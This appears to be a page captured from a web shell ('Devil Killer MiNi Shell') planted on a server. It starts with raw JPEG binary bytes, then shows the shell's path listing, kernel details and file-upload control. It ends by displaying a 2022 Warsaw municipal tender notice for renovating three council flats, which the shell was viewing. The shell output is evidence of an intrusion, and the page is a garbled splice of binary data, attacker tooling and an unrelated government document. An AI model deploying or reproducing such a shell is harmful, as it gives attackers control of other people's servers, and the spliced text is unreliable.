JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220609/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20220609/0020272201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont mieszkalnych lokali komunalnych w 3 częściach – <br/>- część I – ul. Bieniewicka 2b m. 6;<br/>- część II - ul. Marii Kazimiery 1 m. 38;<br/>- część III - ul. Śmiała 5/7 m. 18;<br/>w Dzielnicy Żoliborz </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;ZAKŁAD GOSPODAROWANIA NIERUCHOMOŚCIAMI W DZIELNICY ŻOLIBORZ M.ST. WARSZAWY&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011104337</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marii Kazimiery 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-641</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pgrochot@zgnzoliborz.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgnzoliborz.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont mieszkalnych lokali komunalnych w 3 częściach – <br/>- część I – ul. Bieniewicka 2b m. 6;<br/>- część II - ul. Marii Kazimiery 1 m. 38;<br/>- część III - ul. Śmiała 5/7 m. 18;<br/>w Dzielnicy Żoliborz </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0de8c093-e7ef-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00202722</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00004619/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remonty pustostanów w zasobie ZGN Żoliborz</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zgnzoliborz.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zgnzoliborz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu Platformy eZamawiający https://zgnzoliborz.ezamawiajacy.pl/ oraz<br/>poczty elektronicznej.2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na Platformie eZamawiający. Wykonawca posiadający<br/>konto na Platformie eZamawiający ma dostęp do formularzy: złożenia, zmiany i wycofania oferty oraz<br/>do formularza do komunikacji. 3. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji przekazywanych<br/>przy ich użyciu zostały opisane na Platformie eZamawiający. 4. Wykonawca przystępując do<br/>niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>Platformy eZamawiający oraz zobowiązuje się korzystając z Platformy eZamawiający przestrzegać<br/>postanowień opisanych na platformie. 5. Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>dedykowanych formularzy do: złożenia, zmiany i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6. Za datę przekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych<br/>informacji przyjmuje się datę ich przekazania na Platformie eZamawiający, a w przypadku<br/>przekazywania tych dokumentów oraz informacji za pomocą poczty elektronicznej - datą ich przesłania<br/>będzie potwierdzenie dostarczenia wiadomości zawierającej dokument/informację z serwera<br/>pocztowego Zamawiającego.7. Zamawiający przekazuje link do postępowania<br/>https://zgnzoliborz.ezamawiajacy.pl/ oraz Numer postępowania ZGN/PZP/12/2022 jako załącznik do<br/>niniejszej SWZ. Dane postępowanie można wyszukać również na Liście przetargów PZP, przetargi<br/>Aktualne” klikając wcześniej opcję „Dla Wykonawców”.8. W postępowaniu o udzielenie zamówienia<br/>komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie dokumentów<br/>elektronicznych (innych niż oferta oraz załączniki do oferty), cyfrowych odwzorowań dokumentów oraz przekazywanie informacji<br/>odbywa się elektronicznie za pośrednictwem dedykowanego formularza<br/>dostępnego na Platformie eZamawiający. We wszelkiej korespondencji związanej z<br/>niniejszympostępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>pgrochot@zgnzoliborz.waw.pl9. Dokumenty elektroniczne (inne niż oferta oraz załączniki do oferty)<br/>oraz cyfrowe odwzorowania dokumentów składane są przez Wykonawcę za pośrednictwem<br/>Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania ww.<br/>dokumentów elektronicznych oraz cyfrowych odwzorowań dokumentów za pomocą poczty<br/>elektronicznej, na adres email pgrochot@zgnzoliborz.waw.pl 10. Sposób sporządzenia dokumentów<br/>elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgody z wymaganiami<br/>określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452). 11. Zamawiający nie przewiduje<br/>sposobukomunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji<br/>elektronicznej, wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zgnzoliborz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotyczącaprzetwarzaniadanychosobowych 1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku zprzetwarzaniemdanych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchyleniadyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L<br/>119 z04.05.2016, str.1), dalej„RODO”, informuję, że: • administratorem Pani/Pana danych osobowych<br/>jestZakładGospodarowaniaNieruchomościami w Dzielnicy Żoliborz m.st. Warszawy ul. Marii Kazimiery<br/>1,01-641Warszawa; • wsprawach związanych z Pani/Pana danymi proszę kontaktować się<br/>zInspektoremOchrony Danych,kontakt pisemny za pomocą poczty elektronicznej na adres<br/>email:iod@zgnzoliborz.waw.pl; •Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.<br/>1lit. cRODO w celuprowadzenia przedmiotowego postępowania o udzielenie zamówienia<br/>publicznegoorazzawarciaumowy, a podstawą prawną ich przetwarzania jest obowiązek<br/>prawnystosowaniasformalizowanychprocedur udzielania zamówień publicznych spoczywający<br/>naZamawiającym; •odbiorcami Pani/Panadanych osobowych będą osoby lub podmioty,<br/>którymudostępniona zostaniedokumentacjapostępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>•Pani/Pana dane osobowebędąprzechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>latod dniazakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza<br/>4lata,okresprzechowywania obejmuje cały czas trwania umowy; • obowiązek podania<br/>przezPanią/Panadanychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowymokreślonymwprzepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzieleniezamówieniapublicznego;konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; • wodniesieniu doPani/Panadanych osobowych decyzje nie będą podejmowane w<br/>sposóbzautomatyzowany, stosowaniedo art. 22RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani: − na podstawie art.<br/>15RODOprawodostępu do danych osobowych Pani/Pana dotyczących; − na podstawie art. 16 RODOprawodosprostowania lub<br/>uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie<br/>zprawadosprostowania lub uzupełnienia nie może skutkować zmianą wyniku<br/>postępowaniaoudzieleniezamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym zustawąPzp oraznie może naruszać integralności protokołu oraz jego załączników. − na<br/>podstawie art.18RODO prawożądania od administratora ograniczenia przetwarzania danych<br/>osobowychzzastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo<br/>doograniczeniaprzetwarzanianie ma zastosowania w odniesieniu do przechowywania, w<br/>celuzapewnienia korzystaniaze środkówochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lubprawnej, lub z uwagi naważnewzględy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego, a także nieograniczaprzetwarzania danych osobowych do czasu<br/>zakończeniapostępowania o udzieleniezamówienia. −prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uznaPani/Pan, żeprzetwarzanie danych osobowych Pani/Pana<br/>dotyczącychnarusza przepisy RODO; • nieprzysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub<br/>e RODOprawo do usunięcia danych osobowych; −prawo do przenoszenia danych osobowych, o<br/>którym mowaw art. 20 RODO; − napodstawie art. 21RODO prawo sprzeciwu, wobec przetwarzania<br/>danychosobowych, gdyż podstawąprawnąprzetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1<br/>lit. cRODO.2.JednocześnieZamawiający przypomina o ciążącym na Pani/Panu<br/>obowiązkuinformacyjnymwynikającym z art. 14RODO względem osób fizycznych, których dane<br/>przekazanezostanąZamawiającemu w związku zprowadzonym postępowaniem i które Zamawiający<br/>pośredniopozyska odwykonawcy biorącego udziałw postępowaniu, chyba że ma zastosowanie co<br/>najmniej jednozwyłączeń, o których mowa w art. 14ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGN/PZP/12/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 50530,69 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Remont mieszkalnych lokali komunalnych w 3 częściach: - cz. I - ul. Bieniewicka 2b m. 6, w Dzielnicy Żoliborz m.st. Warszawy. Szczegółowy zakres zamówienia opisany został w załączniku Nr 6 do SWZ – Opisie przedmiotu zamówienia oraz Specyfikacji Technicznej Wykonania i Odbioru Robót – załącznik Nr 5 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 20549,66 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Remont mieszkalnych lokali komunalnych w 3 częściach: cz. II - ul. Marii Kazimiery 1 m. 38, w Dzielnicy Żoliborz m.st. Warszawy. Szczegółowy zakres zamówienia opisany został w załączniku Nr 6 do SWZ – Opisie przedmiotu zamówienia oraz Specyfikacji Technicznej Wykonania i Odbioru Robót – załącznik Nr 5 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 15682,56 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Remont mieszkalnych lokali komunalnych w 3 częściach: - cz. III - ul. Śmiała 5/7 m. 18, w Dzielnicy Żoliborz m.st. Warszawy. Szczegółowy zakres zamówienia opisany został w załączniku Nr 6 do SWZ – Opisie przedmiotu zamówienia oraz Specyfikacji Technicznej Wykonania i Odbioru Robót – załącznik Nr 5 do SWZ. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 14298,47 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Aktualny odpis z właściwego<br/>rejestru lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji wystawiony nie<br/>wcześniej niż 6 miesięcy przed jego złożeniem.<br/>Wyjaśnienie: Wykonawca nie jest zobowiązany do złożenia informacji z KRS lub CEiDG, jeżeli<br/>zamawiający może go uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile<br/>wykonawca dostarczył dane umożliwiające dostęp do tych dokumentów,<br/>Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu składane<br/>wraz z ofertą pod rygorem nieważności, w formie elektronicznej. zamawiający może go uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych 